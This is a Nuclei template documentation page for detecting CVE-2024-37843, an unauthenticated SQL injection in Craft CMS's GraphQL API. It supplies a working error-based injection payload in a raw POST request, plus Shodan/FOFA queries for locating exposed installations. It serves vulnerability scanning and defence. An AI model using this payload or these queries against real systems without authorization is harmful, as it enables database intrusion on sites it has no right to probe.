Skip to content
Nuclei Templates

Craft CMS <=v3.7.31 - SQL Injection

ID: CVE-2024-37843

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,craftcms,sqli

Description

Section titled “Description”

Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.

YAML Source

Section titled “YAML Source”
id: CVE-2024-37843


info:
  name: Craft CMS <=v3.7.31 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Craft CMS up to v3.7.31 was discovered to contain a SQL injection vulnerability via the GraphQL API endpoint.
  reference:
    - https://blog.smithsecurity.biz/craft-cms-unauthenticated-sqli-via-graphql
    - https://github.com/gsmith257-cyber/CVE-2024-37843-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-37843
    cwe-id: CWE-89
    epss-score: 0.00091
    epss-percentile: 0.39447
    cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
  metadata:
    vendor: craftcms
    product: craft_cms
    shodan-query:
      - cpe:"cpe:2.3:a:craftcms:craft_cms"
      - http.html:"craftcms"
      - http.favicon.hash:"-47932290"
      - "X-Powered-By: Craft CMS"
    fofa-query:
      - body=craftcms
      - icon_hash=-47932290
    publicwww-query: craftcms
  tags: cve,cve2024,craftcms,sqli


variables:
  matcher: "{{rand_base(4)}}"


http:
  - raw:
      - |
        POST /api/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type:application/json


        {"query":"query  IntrospectionQuery  {assets(orderBy: \"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\", limit: 5){filename}}"}


    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "General error: 1105 XPATH syntax error: '\\n{{matcher}}"


      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a00473045022065241c1ba554de8bd61d8aa373beabad8163293d7446f90172bfe047011d5239022100d982bd9c9ef0f22231e6859e1e00db82c1a18ee617fb67a29775f42127bc20b3:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-37843.yaml"

View on Github